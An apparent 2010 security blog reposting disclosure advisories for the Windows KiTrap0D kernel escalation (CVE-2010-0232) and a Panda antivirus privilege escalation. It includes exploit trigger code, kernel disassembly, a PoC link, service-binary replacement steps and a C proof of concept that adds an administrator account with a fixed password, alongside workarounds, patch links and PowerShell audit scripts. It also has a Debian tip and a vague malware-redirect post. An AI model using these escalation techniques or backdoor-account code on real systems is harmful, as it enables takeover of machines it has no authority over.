Wednesday, February 3, 2010

Debian APT issue, how to resolve it ...

Today, while doing some work on my Debian box, I ran into an almost unknown issue.
There is a problem in the APT package manager that typically originates from the /etc/fstab configuration file; it is surprising for such a big project as Debian!
Whenever you want to use your source lists, whether cdrom or http sources, there is an issue that will be nasty to you:
the prompt always asks you to insert the /cdrom.
At this point I looked at the /etc/fstab configuration file, which had the following content:

# /etc/fstab: static file system information.
#
#
proc /proc proc defaults 0 0
/dev/mapper/dhcppc0-root / ext3 errors=remount-ro 0 1
/dev/sda1 /boot ext2 defaults 0 2
/dev/mapper/dhcppc0-home /home ext3 defaults 0 2
/dev/mapper/dhcppc0-tmp /tmp ext3 defaults 0 2
/dev/mapper/dhcppc0-usr /usr ext3 defaults 0 2
/dev/mapper/dhcppc0-var /var ext3 defaults 0 2
/dev/mapper/dhcppc0-swap_1 none swap sw 0 0
/dev/scd0 /media/cdrom0 udf,iso9660 user,noauto 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto 0 0


From this I realized that the cdrom would be mounted from /dev/scd0, so I issued umount /dev/scd0 ... with no success.
After that I issued the mount command:


With this command I found the real mount point at the end of the listing; the commands that actually fixed it were:

umount /dev/hdb
mount /dev/hdb /media/cdrom

With these two commands APT will realize that the mount point is /cdrom/ and will not prompt you any more; this is because Debian mounts the cdrom at /media/[LABEL OF THE CD].
I don't know how this problem can be solved permanently, but I think there should be an update for Debian.

goodluck

- Genius

Friday, January 22, 2010

2 important privilege vulnerabilities !

While surfing through new vulnerabilities I saw two important privilege escalation vulnerabilities: the first is a Windows (even Windows 7) user mode to ring0 escalation vulnerability, while the other security advisory is about a Panda Security privilege escalation vulnerability.
Well, I'll refer to Security Reason for them.

Microsoft Windows 7 and prior user mode to ring 0 escalation

"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
-------------------------------------------------------------------------

CVE-2010-0232

In order to support BIOS service routines in legacy 16bit applications, the
Windows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode
monitor code. These are implemented in two stages, the kernel transitions to
the second stage when the #GP trap handler (nt!KiTrap0D) detects that the
faulting cs:eip matches specific magic values.

Transitioning to the second stage involves restoring execution context and
call stack (which had been previously saved) from the faulting trap frame
once authenticity has been verified.

This verification relies on the following incorrect assumptions:

- Setting up a VDM context requires SeTcbPrivilege.
- ring3 code cannot install arbitrary code segment selectors.
- ring3 code cannot forge a trap frame.

This is believed to affect every release of the Windows NT kernel, from
Windows NT 3.1 (1993) up to and including Windows 7 (2009).

Working out the details of the attack is left as an exercise for the
reader.

Just kidding, that was an homage to Derek Soeder :-)

- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.

Creating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order
to access the authenticated system service, NtVdmControl(). VdmAllowed can
only be set using NtSetInformationProcess(), which verifies the caller has
SeTcbPrivilege. If this is true, the caller is very privileged and can
certainly be trusted.

This restriction can be subverted by requesting the NTVDM subsystem, and then
using CreateRemoteThread() to execute in the context of the subsystem process,
which will already have this flag set.

- Assumption 1: ring3 code cannot install arbitrary code segment selectors.

Cpl is usually equal to the two least significant bits of cs and ss, and is
a simple way to calculate the privilege of a task. However, there is an
exception, Virtual-8086 mode.

Real mode uses a segmented addressing scheme in order to allow 16-bit
addresses to access the 20-bit address space. This is achieved by forming
physical addresses from a calculation like (cs << 4) + (eip & 0xffff). The
same calculation is used to map the segmented real address space onto the
protected linear address space in Virtual-8086 mode. Therefore, I must be
permitted to set cs to any value, and checks for disallowed or privileged
selectors can be bypassed (PsSetLdtEntries will reject any selector where any
of the three lower bits are unset, as is the case with the required cs pair).

- Assumption 2: ring3 code cannot forge a trap frame.

Returning to usermode with iret is a complicated operation, the pseudocode for
the iret instruction alone spans several pages of Intel's Software Developers
Manual. The operation occurs in two stages, a pre-commit stage and a
post-commit stage. Using the VdmContext installed using NtVdmControl(), an
invalid context can be created that causes iret to fail pre-commit, thus
forging a trap frame.

The final requirement involves predicting the address of the second-stage BIOS
call handler. The address is static in Windows 2003, XP and earlier operating
systems, however, Microsoft introduced kernel base randomisation in Windows
Vista. Unfortunately, this potentially useful exploit mitigation is trivial
to defeat locally as unprivileged users can simply query the loaded module
list via NtQuerySystemInformation().

--------------------
Affected Software
------------------------

All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to
be affected, including but not limited to the following actively supported
versions:

- Windows 2000
- Windows XP
- Windows Server 2003
- Windows Vista
- Windows Server 2008
- Windows 7

--------------------
Consequences
-----------------------

Upon successful exploitation, the kernel stack is switched to an attacker
specified address.

An attacker would trigger the vulnerability by setting up a specially
formed VDM_TIB in their TEB, using a code sequence like this:

/* ... */
// Magic CS required for exploitation
Tib.VdmContext.SegCs = 0x0B;
// Pointer to fake kernel stack
Tib.VdmContext.Esi = &KernelStack;
// Magic IP required for exploitation
Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;

NtCurrentTeb()->Reserved4[0] = &Tib;
/* ... */

Followed by

/* ... */
NtVdmControl(VdmStartExecution, NULL);
/* ... */

Which will reach the following code sequence via the #GP trap handler,
nt!KiTrap0D. Please note how the stack pointer is restored from the saved
(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition
described above.

/* ... */
.text:0043C3CE Ki386BiosCallReturnAddress proc near
.text:0043C3CE mov eax, large fs:KPCR.SelfPcr
.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]
.text:0043C3D7 mov edi, [edi]
.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]
.text:0043C3DC mov ecx, 84h
.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi
.text:0043C3E4 rep movsd
.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]
.text:0043C3E9 add esp, 4
.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]
.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi
.text:0043C3F5 mov eax, [eax+KPCR.TSS]
.text:0043C3F8 sub edi, 220h
.text:0043C3FE mov [eax+KTSS.Esp0], edi
.text:0043C401 pop edx
.text:0043C402 mov [ecx+KTHREAD.Teb], edx
.text:0043C405 pop edx
.text:0043C406 mov large fs:KPCR.NtTib.Self, edx
.text:0043C40D mov ebx, large fs:KPCR.GDT
.text:0043C414 mov [ebx+3Ah], dx
.text:0043C418 shr edx, 10h
.text:0043C41B mov byte ptr [ebx+3Ch], dl
.text:0043C41E mov [ebx+3Fh], dh
.text:0043C421 sti
.text:0043C422 pop edi
.text:0043C423 pop esi
.text:0043C424 pop ebx
.text:0043C425 pop ebp
.text:0043C426 retn 4
/* ... */

Possibly naive example code for triggering this condition is available from
the link below.

http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista
and Windows 7. Support for other affected operating systems is left as an
exercise for the interested reader.

-------------------
Mitigation
-----------------------

If you believe you may be affected, you should consider applying the
workaround described below.

Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack
from functioning, as without a process with VdmAllowed, it is not possible to
access NtVdmControl() (without SeTcbPrivilege, of course).

The policy template "Windows Components\Application Compatibility\Prevent
access to 16-bit applications" may be used within the group policy editor to
prevent unprivileged users from executing 16-bit applications. I'm informed
this is an officially supported machine configuration.

Administrators unfamiliar with group policy may find the videos below
instructive. Further information is available from the Windows Server
Group Policy Home:

http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.

To watch a demonstration of this policy being applied to a Windows Server 2003
domain controller, see the link below.

http://www.youtube.com/watch?v=XRVI4iQ2Nug

To watch a demonstration of this policy being applied to a Windows Server 2008
domain controller, see the link below.

http://www.youtube.com/watch?v=u8pfXW7crEQ

To watch a demonstration of this policy being applied to a shared but
unjoined Windows XP Professional machine, see the link below.

http://www.youtube.com/watch?v=u7Y6d-BVwxk

On Windows NT4, the following knowledgebase article explains how to disable the
NTVDM and WOWEXEC subsystems.

http://support.microsoft.com/kb/220159

Applying these configuration changes will temporarily prevent users from
accessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users
require this functionality.

If you do not require this feature and depend on NT security, consider
permanently disabling it in order to reduce kernel attack surface.

-------------------
Solution
-----------------------

Microsoft was informed about this vulnerability on 12-Jun-2009, and they
confirmed receipt of my report on 22-Jun-2009.

Regrettably, no official patch is currently available. As an effective and easy
to deploy workaround is available, I have concluded that it is in the best
interest of users to go ahead with the publication of this document without an
official patch. It should be noted that very few users rely on NT security, the
primary audience of this advisory is expected to be domain administrators and
security professionals.

-------------------
Credit
-----------------------

This bug was discovered by Tavis Ormandy.

-------------------
Greetz
-----------------------

Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,
ScaryBeasts, spender and all my other elite colleagues.

Check out some photography while at ring0 @ http://flickr.com/meder.

-------------------
References
-----------------------

Derek Soeder has previously reported some legendary NT bugs, including multiple
vdm bugs that, while unrelated to this issue, make fascinating reading.

- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD Local
  Privilege Escalation
- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local
  Privilege Escalation
- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition
  Privilege Escalation
"
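The advisory's workaround is a group policy setting, so a domain administrator wants a quick way to verify it actually landed on each 32-bit host. The PowerShell check below is an added example, not part of Tavis Ormandy's advisory or of any Microsoft tooling; it assumes the "Prevent access to 16-bit applications" policy stores the DWORD VDMDisallowed=1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat, which is where the AppCompat policy template writes it on the Windows versions I know.

```powershell
# Added check (not from the advisory): is this host in the population
# CVE-2010-0232 describes (32-bit x86 Windows NT), and is the
# "Prevent access to 16-bit applications" workaround in effect?
# Assumption: the policy writes DWORD VDMDisallowed=1 under the key below.

function Get-KiTrap0DExposure {
    # 32-bit PowerShell on 64-bit Windows sets PROCESSOR_ARCHITEW6432, so this
    # is true only for a genuinely 32-bit OS, the only kind the advisory covers.
    $is32BitOs = ($env:PROCESSOR_ARCHITECTURE -eq 'x86') -and
                 (-not $env:PROCESSOR_ARCHITEW6432)

    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat'
    $value = Get-ItemProperty -Path $policyKey -Name VDMDisallowed `
                              -ErrorAction SilentlyContinue
    $policyApplied = ($null -ne $value) -and ($value.VDMDisallowed -eq 1)

    # A live ntvdm.exe means a process with VdmAllowed already exists, the
    # precondition the advisory's "Assumption 0" section relies on.
    $vdmCount = @(Get-Process -Name ntvdm -ErrorAction SilentlyContinue).Count

    [PSCustomObject]@{
        Host          = $env:COMPUTERNAME
        OSVersion     = [Environment]::OSVersion.Version.ToString()
        Is32BitOS     = $is32BitOs
        VDMDisallowed = $policyApplied
        NtvdmRunning  = $vdmCount
        # Exposed = in scope for the bug and the workaround is not in place.
        Exposed       = $is32BitOs -and (-not $policyApplied)
    }
}

Get-KiTrap0DExposure | Format-List
```

Run it after a gpupdate on each host; an object with Exposed = True identifies a machine that still needs the policy (or, on NT4, the KB 220159 procedure).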

Panda Security local privilege escalation vulnerability

"Security Advisory NSOADV-2010-001 (Version 2)
______________________________________________


Title: Panda Security Local Privilege Escalation
Severity: Medium
Advisory ID: NSOADV-2010-001
Found Date: 02.2008
Date Reported: 30.11.2009
Release Date: 09.01.2010
Update Date: 20.01.2010
Author: Nikolas Sotiriu (lofi)
Website: http://sotiriu.de
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2010-001.txt
Vendor: Panda Security (http://www.pandasecurity.com/)
Affected Products: (Self tested)
-Panda Security for Business 4.04.10
-Panda Security for Business with Exchange 4.04.10
-Panda Security for Enterprise 4.04.10
-Panda Internet Security 2010 (15.01.00)
-Panda Global Protection 2010 (3.01.00)
-Panda Antivirus Pro 2010 (9.01.00)
-Panda Antivirus for Netbooks (9.01.00)

(Provided by Panda)
-Panda Global Protection 2009
-Panda Internet Security 2009
-Panda Antivirus Pro 2009
-Panda Internet Security 2008
-Panda Antivirus + Firewall 2008
-Panda Platinum 2007 Internet Security
-Panda Platinum 2006 Internet Security

Affected Component: Corporate Products:
-Panda Security for Desktops 4.05.10
-Panda Security for File Servers 8.04.10

Remote Exploitable: No
Local Exploitable: Yes
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his Policy



Background:
===========

Panda Security for Business is the security solution for companies that
need to protect their networks, mainly workstations and file servers.
Panda Security for Business is centrally managed thanks to the
AdminSecure Console, which allows monitoring the entire network,
protecting your critical assets against all types of threats and
optimizing productivity.

(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda
products, which were discovered earlier:

Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615
Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897

The earlier reported vulnerabilities only affected the Home user
products. But the business products had the same bug.

More interesting is, that Panda failed since 2006 each year by
releasing the new version with the same old bug.



Description:
============

1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During installation of Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%\Panda Software\AVTC

by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.

The 32bit Version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe


2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During installation of Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%\Panda Software\AVTC

by default are set to Everyone:Full Control. Few services
(e.g. PavSrvx86.EXE) are started from this folder. Services are started
under LocalSystem account.

In the 64bit Version of Panda Security for Desktops/File Servers is no
TruePrevent package available, which protects the files in the
installation directory from manipulation.

There is no protection of service files. It's possible for unprivileged
user to replace service executable with the file of his choice to get
full access with LocalSystem privileges.

This can be exploited by:

a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder
b. Copy any application to PavSrvX86.exe
c. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe


3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------

During installation of the Panda Security 20XX Products the
permissions for installation folder

%ProgramFiles%\panda security\panda

by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.

This products installs the TruePrevent package by default, which
protects the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%\panda security\panda firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda\PskSvc.exe
%ProgramFiles%\Panda Security\Panda\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda\TPSrv.exe


4. Panda Antivirus for Netbooks
+------------------------------

During installation of the Panda Antivirus for Netbooks the
permissions for installation folder

%ProgramFiles%\panda security\Panda Antivirus for Netbooks

by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.

This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

This product was not patched like the other 2010 products, so the
following vulnerability still exists:

http://www.securityfocus.com/bid/36897

TruePrevent bypass: It can be bypassed using "Open" dialog in
"Quarantine" -> Add file" functionality.

Executable started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe



Proof of Concept :
==================

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    /* Resolve %WINDIR% so net.exe is invoked by its absolute path */
    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"owner\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

    system( szCmdLine );

    return 0;
}



Solution:
=========

Home User Products:
+------------------

Panda Advisory
http://www.pandasecurity.com/homeusers/support/card?id=80173&idIdioma=2


Panda Global Protection 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PGP10/hfgp30906s22_r4.exe

Panda Internet Security 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PIS10/hfp150906s25_r1.exe

Panda Antivirus Pro 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe


Business Products:
+-----------------

Panda Advisory
http://www.pandasecurity.com/enterprise/support/card?id=40061&idIdioma=2

32Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x86_SecurityFix.exe

64Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x64_SecurityFix.exe
"
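The root cause in all four cases above is the same: an install folder at Everyone:Full Control holding binaries that run as LocalSystem, with TruePrevent only masking it and Safe Mode removing the mask. The audit script below is an added example, not part of NSOADV-2010-001 or of Panda's code; it enumerates every service on the host and reports those whose image file, or the folder containing it, grants write-class rights to a broad group, so the condition is caught whichever product or version ships it. It assumes an elevated PowerShell 3 or later session on Windows.

```powershell
# Added audit (not from the advisory): flag services whose executable or its
# folder is writable by Everyone / Users / Authenticated Users / INTERACTIVE.
# Assumption: run elevated in PowerShell 3+ (Get-CimInstance is available).

$BroadGroups = @('Everyone', 'BUILTIN\Users',
                 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Any of these rights lets a user replace or repoint the binary.
$WriteClass = [System.Security.AccessControl.FileSystemRights]`
              'Write, Modify, FullControl, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceImagePath([string]$PathName) {
    # Pull the executable out of a service PathName such as
    #   "C:\Program Files\Panda Software\AVTC\PavSrv51.exe" -service
    # Quoted path first; otherwise everything up to the first ".exe".
    if ($PathName -match '^\s*"([^"]+)"')    { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $null
}

function Get-BroadWriteAces([string]$Path) {
    # Allow ACEs on $Path that give a broad group any write-class right.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadGroups -contains $_.IdentityReference.Value -and
        (($_.FileSystemRights -band $WriteClass) -ne 0)
    }
}

function Find-WritableServiceBinaries {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $exe = Get-ServiceImagePath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
        # Check the binary itself and, as in the Panda case, its parent folder:
        # a writable folder lets a user rename the .exe and drop a replacement.
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            $aces = @(Get-BroadWriteAces $target)
            if ($aces.Count -eq 0) { continue }
            [PSCustomObject]@{
                Service = $svc.Name
                RunsAs  = $svc.StartName
                Path    = $target
                Granted = ($aces | ForEach-Object {
                    "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
            }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize -Wrap
```

Any row whose RunsAs is LocalSystem is the exact situation the advisory describes; the fix is to tighten the folder ACL (Administrators and SYSTEM: Full Control, Users: Read & Execute), not to rely on a self-protection service that Safe Mode does not start.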

Sunday, January 17, 2010

Unwelcome Attack from Maskan-Bank

Unfortunately, the (in)secure Iranian government and critical websites are still highly vulnerable to malware attacks.
I'm still not sure about this one, because of the time I've spent on it.
It's a link to the Maskan Bank; you can click here to see what I mean.
You would like to do something like calculating a value related to your payment.
Well, it really is this one, and when you go to the above link you are in fact talking to this link.
You may have heard about some dangerous attacks from various places, which are known to the people who were affected before this report.
Some websites, pages and other web based places are vulnerable to known web application attacks such as XSS (Cross Site Scripting) and SQL Injection (the most known vulnerability).
An iframe is a well-known HTML element, often inserted by injected JavaScript, that can load a whole page inside a small piece of another page.
As you may expect, this is exactly what I want to say: other malicious pages can be loaded into your vulnerable website pages. Consider that your website's PHP pages may be vulnerable to SQL Injection attacks; if there is an automated tool which scans for such pages and infects them, then it's possible to infect other web pages.
So, is there any kind of web based worm which can do such a thing?
The answer is yes; nowadays this attack is common and can affect any page, even secure web pages!
Well, when you go to the link and want to do some calculations, you will be redirected to a page which is malicious.
There are various kinds of malware which can affect the client browser; exploits and viruses are just a few of them, and it seems this one is a web based virus.
Well, finally, all the attacks come from this jScript page.



Further analysis of this attack will be posted here as soon as possible.

any feedback !?

__Genius__

Friday, January 15, 2010

Back-Track 4.0 final release

Now it's time to announce the final release of BackTrack 4.0 Linux, a distro for penetration testers and hackers.
The primary change of this release is the base of the OS: older releases of this distro were based on Slax, and now it's Debian based.
For more information and download you can follow this link.